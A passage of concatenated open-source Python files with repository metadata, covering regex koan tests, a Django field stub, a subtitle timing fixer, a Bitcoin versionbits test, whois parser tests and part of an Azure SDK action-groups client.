+ "na2.xls\n" \
+ "sa1.xls"
# TIP: remember the name of this lesson
change_this_search_string = r'a.\.xl.' # <-- I want to find all uses of myArray
self.assertEquals(len(re.findall(change_this_search_string, string)),3)
def test_matching_set_character(self):
"""
Lesson 2 Matching sets of characters
A set of characters is defined using the metacharacters [ and ]. Everything between them is part of the set and
any one of the set members must match (but not all).
"""
string = "sales.xlx\n" \
+ "sales1.xls\n" \
+ "orders3.xls\n" \
+ "apac1.xls\n" \
+ "sales2.xls\n" \
+ "na1.xls\n" \
+ "na2.xls\n" \
+ "sa1.xls\n" \
+ "ca1.xls"
# I want to find all files for North America(na) or South America(sa), but not (ca)
# TIP you can use the pattern .a. which matches in above test but in this case matches more than you want
change_this_search_string = '[ns]a[0-9].xls'
self.assertEquals(len(re.findall(change_this_search_string, string)),3)
def test_anything_but_matching(self):
"""
Lesson 2 Using character set ranges
Occasionally, you'll want a list of characters that you don't want to match.
Character sets can be negated using the ^ metacharacter.
"""
string = "sales.xlx\n" \
+ "sales1.xls\n" \
+ "orders3.xls\n" \
+ "apac1.xls\n" \
+ "sales2.xls\n" \
+ "sales3.xls\n" \
+ "europe2.xls\n" \
+ "sam.xls\n" \
+ "na1.xls\n" \
+ "na2.xls\n" \
+ "sa1.xls\n" \
+ "ca1.xls"
# I want to find the name sam
change_this_search_string = '[^nc]am.xls'
self.assertEquals(re.findall(change_this_search_string, string), ['sam.xls'])
|
taw/python_koans
|
python3/koans/about_regex.py
|
Python
|
mit
| 4,842
|
from django.db.models import CharField
DEFAULT_PROTOCOLS = ('http', 'https', 'mailto', 'tel')
class HrefField(CharField):
def __init__(
self,
            protocols=DEFAULT_PROTOCOLS,
allow_paths=True,
allow_fragments=True,
allow_query_strings=True,
max_length=255,
**kwargs):
self.protocols = protocols
self.allow_paths = allow_paths
self.allow_fragments = allow_fragments
self.allow_query_strings = allow_query_strings
kwargs['max_length'] = max_length
super(HrefField, self).__init__(**kwargs)
#TODO - FUNCTIONALITY!
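# A possible shape for the missing validation, sketched as a comment
# (hypothetical; ValidationError would need importing from django.core.exceptions):
# def clean(self, value, model_instance):
#     value = super(HrefField, self).clean(value, model_instance)
#     scheme = value.split(':', 1)[0] if ':' in value else ''
#     if scheme and scheme not in self.protocols:
#         raise ValidationError('Unsupported protocol: %s' % scheme)
#     return value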
|
adamalton/django-href-field
|
hreffield/fields.py
|
Python
|
mit
| 657
|
import json
from collections import OrderedDict
import numpy as np
import matplotlib.pyplot as plt
with open('data/EURUSD3600.json') as f:
data = json.loads(f.read())
data = OrderedDict(sorted(data.items()))
for i, v in data.iteritems():
print 'timestamp', i
print v['rate']
points = OrderedDict(sorted(v['price_points'].items()))
for k, d in points.iteritems():
print k
print points
plt.scatter(i, v['rate'])
plt.show()
|
Tjorriemorrie/trading
|
04_oanda/viz.py
|
Python
|
mit
| 463
|
'''
Created on Mar 28, 2016
@author: Ziv
'''
class MyClass(object):
'''
classdocs
'''
def __init__(self, params):
'''
Constructor
'''
import sys
import os
from getArgs import getParams
from parse import parse
__all__ = []
__version__ = 0.1
__date__ = '2015-05-24'
__updated__ = '2015-05-24'
DEBUG = 1
TESTRUN = 0
PROFILE = 0
def getNextSub(f):
#file is at a beginning of a sub
#returns three strings, None if EOF was reached
#handle multiple empty lines
line = f.readline()
while line == '\n':
line=f.readline()
text=''
num=line[:-1] #remove \n
time=f.readline()[:-1]
for line in f:
if line == '' or line == '\n':
#end of sub
return (num, time, text[:-1])
text += line
    else:  # EOF reached
return (None, None, None)
def convertSubTimetoSec(subTime):
    # receives a sub time: a 12-character string in the format hh:mm:ss,mmm
    # where mmm is milliseconds
#returns the time in seconds, type float
res=parse('{h:d}:{m:d}:{s:d},{ms:d}', subTime)
return res['ms']/1000+res['s']+res['m']*60+res['h']*3600
def convertSectoSubTime(sec):
H = sec//3600
remain=sec%3600
M = remain//60
remain=remain%60
S = remain//1
remain=remain%1
Mili = (remain*1000)//1 #make it an integer
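    # zero-pad hours/minutes/seconds to two digits and milliseconds to three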
res= '{0:0=2n}:{1:0=2n}:{2:0=2n},{3:0=3n}'.format(H,M,S,Mili)
return res
def getMovieLenFromFile(fileName):
with open(fileName, mode='r') as f:
return getMovieLenFromStream(f)
def getMovieLenFromStream(f):
try:
if f.seekable():
f.seek(0, 2)
l=f.tell()
f.seek(l-200, 0)
else:
print ('cannot seek file')
except:
print("Unexpected error:", sys.exc_info()[0])
raise
f.readline() #flush till next line
"find a separating line - an empty line"
for line in f:
if line == '\n': break
else: print('empty line not found')
#get the next sub
(num, time, text) = getNextSub(f)
#get the last sub
(a, b, c) = getNextSub(f)
while a is not None:
(num, time, text) = (a, b, c)
(a, b, c) = getNextSub(f)
#now we have the last sub
return convertSubTimetoSec(time[0:12])
def calculateOffset(params):
"Set fixed file name"
params.outfname = params.fname[:-4]+'.fixed'+params.fname[-4:]
"Handle case were endDiff wasn't specified"
if params.endDiff == None:
params.endDiff = params.startDiff
"Calculates the offsets depending on the time of the entry"
if params.direction == 'movie-before':
"subtitle needs to be earlier, will negate the values"
params.startDiff = -params.startDiff
params.endDiff = -params.endDiff
params.movieLen = getMovieLenFromFile(params.fname)
return params
def correctTime(args, subTime):
t=convertSubTimetoSec(subTime)
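    # linearly interpolate the correction between startDiff (at t = 0) and
    # endDiff (at t = movieLen)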
resT=t+args.startDiff+((args.endDiff-args.startDiff)*(t/args.movieLen))
if resT<0: resT=0
return convertSectoSubTime(resT)
def processFile(args):
try:
inFile = open(args.fname, mode='r')
outFile= open(args.outfname, mode='w')
(num, time, text) = getNextSub(inFile)
while num is not None:
t1=correctTime(args, time[:12])
t2=correctTime(args, time[17:])
outFile.write(num+'\n')
outFile.write(t1+' --> '+t2+'\n')
outFile.write(text+'\n\n')
(num, time, text) = getNextSub(inFile)
inFile.close()
outFile.close()
except:
print("Unexpected error:", sys.exc_info()[0])
print("out file name:%s\n" % args.outfname)
raise
return True
|
ziv17/SRT-tools
|
srtFix/src/srtFix/processFile.py
|
Python
|
mit
| 3,797
|
#!/usr/bin/env python3
# Copyright (c) 2016 The Bitcoin Core developers
# Copyright (c) 2016 The Bitcoin Unlimited developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
from test_framework.mininode import *
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
import time
from test_framework.blocktools import create_block, create_coinbase
'''
Test version bits' warning system.
Generate chains with block versions that appear to be signalling unknown
soft-forks, and test that warning alerts are generated.
'''
VB_PERIOD = 144 # versionbits period length for regtest
VB_THRESHOLD = 108 # versionbits activation threshold for regtest
VB_TOP_BITS = 0x20000000
VB_UNKNOWN_BIT = 27 # Choose a bit unassigned to any deployment
# TestNode: bare-bones "peer". Used mostly as a conduit for a test to sending
# p2p messages to a node, generating the messages in the main testing logic.
class TestNode(NodeConnCB):
def __init__(self):
NodeConnCB.__init__(self)
self.connection = None
self.ping_counter = 1
self.last_pong = msg_pong()
def add_connection(self, conn):
self.connection = conn
def on_inv(self, conn, message):
pass
# Wrapper for the NodeConn's send_message function
def send_message(self, message):
self.connection.send_message(message)
def on_pong(self, conn, message):
self.last_pong = message
# Sync up with the node after delivery of a block
def sync_with_ping(self, timeout=30):
self.connection.send_message(msg_ping(nonce=self.ping_counter))
received_pong = False
sleep_time = 0.05
while not received_pong and timeout > 0:
time.sleep(sleep_time)
timeout -= sleep_time
with mininode_lock:
if self.last_pong.nonce == self.ping_counter:
received_pong = True
self.ping_counter += 1
return received_pong
class VersionBitsWarningTest(BitcoinTestFramework):
def setup_chain(self):
initialize_chain_clean(self.options.tmpdir, 1)
def setup_network(self):
self.nodes = []
self.alert_filename = os.path.join(self.options.tmpdir, "alert.txt")
# Open and close to create zero-length file
with open(self.alert_filename, 'w') as f:
pass
self.node_options = ["-debug", "-logtimemicros=1", "-alertnotify=echo %s >> \"" + self.alert_filename + "\""]
self.nodes.append(start_node(0, self.options.tmpdir, self.node_options))
import re
self.vb_pattern = re.compile("^Warning.*versionbit")
# Send numblocks blocks via peer with nVersionToUse set.
def send_blocks_with_version(self, peer, numblocks, nVersionToUse):
tip = self.nodes[0].getbestblockhash()
height = self.nodes[0].getblockcount()
block_time = self.nodes[0].getblockheader(tip)["time"]+1
tip = int(tip, 16)
for i in range(numblocks):
block = create_block(tip, create_coinbase(height+1), block_time)
block.nVersion = nVersionToUse
block.solve()
peer.send_message(msg_block(block))
block_time += 1
height += 1
tip = block.sha256
peer.sync_with_ping()
def test_versionbits_in_alert_file(self):
with open(self.alert_filename, 'r') as f:
alert_text = f.read()
assert(self.vb_pattern.match(alert_text))
def run_test(self):
# Setup the p2p connection and start up the network thread.
test_node = TestNode()
connections = []
connections.append(NodeConn('127.0.0.1', p2p_port(0), self.nodes[0], test_node))
test_node.add_connection(connections[0])
NetworkThread().start() # Start up network handling in another thread
# Test logic begins here
test_node.wait_for_verack()
# 1. Have the node mine one period worth of blocks
self.nodes[0].generate(VB_PERIOD)
# 2. Now build one period of blocks on the tip, with < VB_THRESHOLD
# blocks signaling some unknown bit.
nVersion = VB_TOP_BITS | (1<<VB_UNKNOWN_BIT)
self.send_blocks_with_version(test_node, VB_THRESHOLD-1, nVersion)
# Fill rest of period with regular version blocks
self.nodes[0].generate(VB_PERIOD - VB_THRESHOLD + 1)
# Check that we're not getting any versionbit-related errors in
# getinfo()
assert(not self.vb_pattern.match(self.nodes[0].getinfo()["errors"]))
# 3. Now build one period of blocks with >= VB_THRESHOLD blocks signaling
# some unknown bit
self.send_blocks_with_version(test_node, VB_THRESHOLD, nVersion)
self.nodes[0].generate(VB_PERIOD - VB_THRESHOLD)
# Might not get a versionbits-related alert yet, as we should
# have gotten a different alert due to more than 51/100 blocks
# being of unexpected version.
# Check that getinfo() shows some kind of error.
assert(len(self.nodes[0].getinfo()["errors"]) != 0)
# Mine a period worth of expected blocks so the generic block-version warning
# is cleared, and restart the node. This should move the versionbit state
# to ACTIVE.
self.nodes[0].generate(VB_PERIOD)
stop_node(self.nodes[0], 0)
wait_bitcoinds()
# Empty out the alert file
with open(self.alert_filename, 'w') as f:
pass
self.nodes[0] = start_node(0, self.options.tmpdir, ["-debug", "-logtimemicros=1", "-alertnotify=echo %s >> \"" + self.alert_filename + "\""])
# Connecting one block should be enough to generate an error.
self.nodes[0].generate(1)
assert(len(self.nodes[0].getinfo()["errors"]) != 0)
stop_node(self.nodes[0], 0)
wait_bitcoinds()
self.test_versionbits_in_alert_file()
# Test framework expects the node to still be running...
self.nodes[0] = start_node(0, self.options.tmpdir, ["-debug", "-logtimemicros=1", "-alertnotify=echo %s >> \"" + self.alert_filename + "\""])
if __name__ == '__main__':
VersionBitsWarningTest().main()
|
marlengit/BitcoinUnlimited
|
qa/rpc-tests/p2p-versionbits-warning.py
|
Python
|
mit
| 6,299
|
from rest_framework import serializers
from rest_framework import pagination
from .models import Airport
class AirportSerializer(serializers.ModelSerializer):
    class Meta:
        model = Airport
        read_only_fields = ('id', 'name', 'city', 'country', 'country_code', 'iata', 'icao')
class PaginationAirportSerializer(pagination.PaginationSerializer):
class Meta:
object_serializer_class = AirportSerializer
|
illing2005/django-airports-apis
|
airports/serializers.py
|
Python
|
mit
| 433
|
# This file is autogenerated. Do not edit it manually.
# If you want change the content of this file, edit
#
# spec/fixtures/responses/whois.nic.sn/status_registered
#
# and regenerate the tests with the following script
#
# $ scripts/generate_tests.py
#
from nose.tools import *
from dateutil.parser import parse as time_parse
import yawhois
class TestWhoisNicSnStatusRegistered(object):
def setUp(self):
fixture_path = "spec/fixtures/responses/whois.nic.sn/status_registered.txt"
host = "whois.nic.sn"
part = yawhois.record.Part(open(fixture_path, "r").read(), host)
self.record = yawhois.record.Record(None, [part])
def test_status(self):
eq_(self.record.status, 'registered')
def test_available(self):
eq_(self.record.available, False)
def test_domain(self):
eq_(self.record.domain, "google.sn")
def test_nameservers(self):
eq_(self.record.nameservers.__class__.__name__, 'list')
eq_(len(self.record.nameservers), 4)
eq_(self.record.nameservers[0].__class__.__name__, 'Nameserver')
eq_(self.record.nameservers[0].name, "ns1.google.com")
eq_(self.record.nameservers[1].__class__.__name__, 'Nameserver')
eq_(self.record.nameservers[1].name, "ns2.google.com")
eq_(self.record.nameservers[2].__class__.__name__, 'Nameserver')
eq_(self.record.nameservers[2].name, "ns3.google.com")
eq_(self.record.nameservers[3].__class__.__name__, 'Nameserver')
eq_(self.record.nameservers[3].name, "ns4.google.com")
def test_admin_contacts(self):
eq_(self.record.admin_contacts.__class__.__name__, 'list')
eq_(len(self.record.admin_contacts), 1)
eq_(self.record.admin_contacts[0].__class__.__name__, 'Contact')
eq_(self.record.admin_contacts[0].type, yawhois.record.Contact.TYPE_ADMINISTRATIVE)
eq_(self.record.admin_contacts[0].id, "C5-SN")
eq_(self.record.admin_contacts[0].name, "C5-SN")
def test_registered(self):
eq_(self.record.registered, True)
def test_created_on(self):
eq_(self.record.created_on.__class__.__name__, 'datetime')
eq_(self.record.created_on, time_parse('2008-05-08 17:59:38.43'))
def test_registrar(self):
eq_(self.record.registrar.__class__.__name__, 'Registrar')
eq_(self.record.registrar.id, "registry")
eq_(self.record.registrar.name, "registry")
def test_registrant_contacts(self):
eq_(self.record.registrant_contacts.__class__.__name__, 'list')
eq_(len(self.record.registrant_contacts), 1)
eq_(self.record.registrant_contacts[0].__class__.__name__, 'Contact')
eq_(self.record.registrant_contacts[0].type, yawhois.record.Contact.TYPE_REGISTRANT)
eq_(self.record.registrant_contacts[0].id, "C4-SN")
eq_(self.record.registrant_contacts[0].name, "C4-SN")
def test_technical_contacts(self):
eq_(self.record.technical_contacts.__class__.__name__, 'list')
eq_(len(self.record.technical_contacts), 1)
eq_(self.record.technical_contacts[0].__class__.__name__, 'Contact')
eq_(self.record.technical_contacts[0].type, yawhois.record.Contact.TYPE_TECHNICAL)
eq_(self.record.technical_contacts[0].id, "C6-SN")
eq_(self.record.technical_contacts[0].name, "C6-SN")
def test_updated_on(self):
assert_raises(yawhois.exceptions.AttributeNotSupported, self.record.updated_on)
def test_domain_id(self):
assert_raises(yawhois.exceptions.AttributeNotSupported, self.record.domain_id)
def test_expires_on(self):
assert_raises(yawhois.exceptions.AttributeNotSupported, self.record.expires_on)
def test_disclaimer(self):
assert_raises(yawhois.exceptions.AttributeNotSupported, self.record.disclaimer)
|
huyphan/pyyawhois
|
test/record/parser/test_response_whois_nic_sn_status_registered.py
|
Python
|
mit
| 3,849
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class ActionGroupsOperations:
"""ActionGroupsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~$(python-base-namespace).v2018_03_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def create_or_update(
self,
resource_group_name: str,
action_group_name: str,
action_group: "_models.ActionGroupResource",
**kwargs: Any
) -> "_models.ActionGroupResource":
"""Create a new action group or update an existing one.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param action_group_name: The name of the action group.
:type action_group_name: str
:param action_group: The action group to create or use for the update.
:type action_group: ~$(python-base-namespace).v2018_03_01.models.ActionGroupResource
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ActionGroupResource, or the result of cls(response)
:rtype: ~$(python-base-namespace).v2018_03_01.models.ActionGroupResource
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ActionGroupResource"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-03-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.create_or_update.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'actionGroupName': self._serialize.url("action_group_name", action_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(action_group, 'ActionGroupResource')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('ActionGroupResource', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('ActionGroupResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.insights/actionGroups/{actionGroupName}'} # type: ignore
async def get(
self,
resource_group_name: str,
action_group_name: str,
**kwargs: Any
) -> "_models.ActionGroupResource":
"""Get an action group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param action_group_name: The name of the action group.
:type action_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ActionGroupResource, or the result of cls(response)
:rtype: ~$(python-base-namespace).v2018_03_01.models.ActionGroupResource
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ActionGroupResource"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-03-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'actionGroupName': self._serialize.url("action_group_name", action_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('ActionGroupResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.insights/actionGroups/{actionGroupName}'} # type: ignore
async def delete(
self,
resource_group_name: str,
action_group_name: str,
**kwargs: Any
) -> None:
"""Delete an action group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param action_group_name: The name of the action group.
:type action_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-03-01"
accept = "application/json"
# Construct URL
url = self.delete.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'actionGroupName': self._serialize.url("action_group_name", action_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.insights/actionGroups/{actionGroupName}'} # type: ignore
async def update(
self,
resource_group_name: str,
action_group_name: str,
action_group_patch: "_models.ActionGroupPatchBody",
**kwargs: Any
) -> "_models.ActionGroupResource":
"""Updates an existing action group's tags. To update other fields use the CreateOrUpdate method.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param action_group_name: The name of the action group.
:type action_group_name: str
:param action_group_patch: Parameters supplied to the operation.
:type action_group_patch: ~$(python-base-namespace).v2018_03_01.models.ActionGroupPatchBody
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ActionGroupResource, or the result of cls(response)
:rtype: ~$(python-base-namespace).v2018_03_01.models.ActionGroupResource
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ActionGroupResource"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-03-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'actionGroupName': self._serialize.url("action_group_name", action_group_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(action_group_patch, 'ActionGroupPatchBody')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('ActionGroupResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.insights/actionGroups/{actionGroupName}'} # type: ignore
def list_by_subscription_id(
self,
**kwargs: Any
) -> AsyncIterable["_models.ActionGroupList"]:
"""Get a list of all action groups in a subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ActionGroupList or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~$(python-base-namespace).v2018_03_01.models.ActionGroupList]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ActionGroupList"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-03-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_by_subscription_id.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('ActionGroupList', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_by_subscription_id.metadata = {'url': '/subscriptions/{subscriptionId}/providers/microsoft.insights/actionGroups'} # type: ignore
def list_by_resource_group(
self,
resource_group_name: str,
**kwargs: Any
) -> AsyncIterable["_models.ActionGroupList"]:
"""Get a list of all action groups in a resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ActionGroupList or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~$(python-base-namespace).v2018_03_01.models.ActionGroupList]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ActionGroupList"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-03-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_by_resource_group.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('ActionGroupList', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.insights/actionGroups'} # type: ignore
async def enable_receiver(
self,
resource_group_name: str,
action_group_name: str,
enable_request: "_models.EnableRequest",
**kwargs: Any
) -> None:
"""Enable a receiver in an action group. This changes the receiver's status from Disabled to
Enabled. This operation is only supported for Email or SMS receivers.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param action_group_name: The name of the action group.
:type action_group_name: str
:param enable_request: The receiver to re-enable.
:type enable_request: ~$(python-base-namespace).v2018_03_01.models.EnableRequest
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-03-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.enable_receiver.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'actionGroupName': self._serialize.url("action_group_name", action_group_name, 'str'),
